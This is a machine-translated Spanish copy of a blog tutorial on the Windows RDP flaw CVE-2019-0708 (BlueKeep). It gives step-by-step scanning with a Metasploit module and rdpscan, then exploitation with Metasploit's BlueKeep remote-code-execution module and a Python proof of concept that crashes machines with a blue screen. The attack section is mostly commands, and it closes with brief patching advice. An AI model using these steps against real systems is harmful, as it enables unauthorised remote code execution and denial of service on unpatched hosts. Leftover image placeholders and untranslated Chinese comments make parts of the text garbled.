CVE-2019-0708 windwos Remote Desktop Protocol (RDP) explotación y endurecimiento de la vulnerabilidad


Descripción de la vulnerabilidad

  Cuando un atacante no autenticado utiliza RDP para conectarse al sistema de destino y enviar una solicitud especialmente diseñada (también conocida como "Vulnerabilidad de ejecución de código remoto del servicio de escritorio remoto"), existe una vulnerabilidad de ejecución de código remoto en el servicio de escritorio remoto (anteriormente conocido como Para terminal servicios).

Versión de impacto

  • Windows XP SP3 x86
  • Windows XP Professional x64 Edition SP2
  • Windows XP Embedded SP3 x86
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 x64 versión SP2
  • Windows Server 2003 R2 SP2
  • Windows Server 2003 R2 x64 版 SP2
  • Windows Vista SP2
  • Windows Vista x64 versión SP2
  • Windows 7

Construcción de entornos de vulnerabilidad

Descarga de Thunder:

ed2k: // | archivo | cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso | 3420557312 | B58548681854236C7939003B583A8078 | /

Al crear una máquina virtual, recuerde elegir la versión profesional para instalar, la versión doméstica predeterminada (la versión doméstica no tiene conexión remota)
Inserte la descripción de la imagen aquí
permite la conexión remota

Inserte la descripción de la imagen aquí

Detección de vulnerabilidades

herramienta kali


Iniciar msf

msfconsole

Búsqueda de detección de vulnerabilidades exp

search 2019_0708

Inserte la descripción de la imagen aquí

Cargue el módulo, configure la ip que se detectará

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.234.129
run

El mensaje The target is vulnerableindica que existe la vulnerabilidad.
Inserte la descripción de la imagen aquí
La detección de IP múltiple solo necesita configurar el formato de IP según las siguientes reglas

set rhosts 192.168.234.128-133

Inserte la descripción de la imagen aquí

Herramienta de detección debajo de las ventanas

Dirección de descarga de la herramienta: https://github.com/k8gege/CVE-2019-0708

Uso de herramientas:

#批量扫描
rdpscan.exe 192.168.234.1-192.168.234.254
#单个扫描
rdpscan.exe 192.168.234.129

Si hay VULNERABLE - CVE-2019-0708una vulnerabilidad
Inserte la descripción de la imagen aquí

Explotar

Las restricciones de vulnerabilidad son relativamente grandes, los scripts rec que se encuentran actualmente son solo para sistemas Windows 7

Ejecución remota de código

Máquina de ataque: kali
target machine: windows 7

#启动msf
msfconsole

# 搜索2019-0708漏洞模块
search 2019-0708
#选择利用模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#设置ip并进行工具
set rhosts 192.168.234.132
#修改目标系统类型(视情况而定)
set target 1
#执行攻击
run

Inserte la descripción de la imagen aquí

De lo set target 1contrario, debemos probar los scripts exp de otros sistemas, show targetspuede ver los scripts exp para el sistema correspondiente

Inserte la descripción de la imagen aquí

Pantalla azul

Utilice la herramienta:
https://github.com/CVE-2019-0708/CVE-2019-0708

Instrucciones:

#python PoC.py ip
python PoC.py 192.168.234.129

Puede usar WinXP | XP Embedded | Win7 | Server 2003 | Pantalla azul del sistema Server 2008
Inserte la descripción de la imagen aquí

Fortalecimiento de la vulnerabilidad

  1. Instale un 360, Tinder y otro software de seguridad.
  2. Instale el parche oficial de Microsoft: https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

Supongo que te gusta

Origin blog.csdn.net/weixin_41924764/article/details/109522132
Recomendado
Clasificación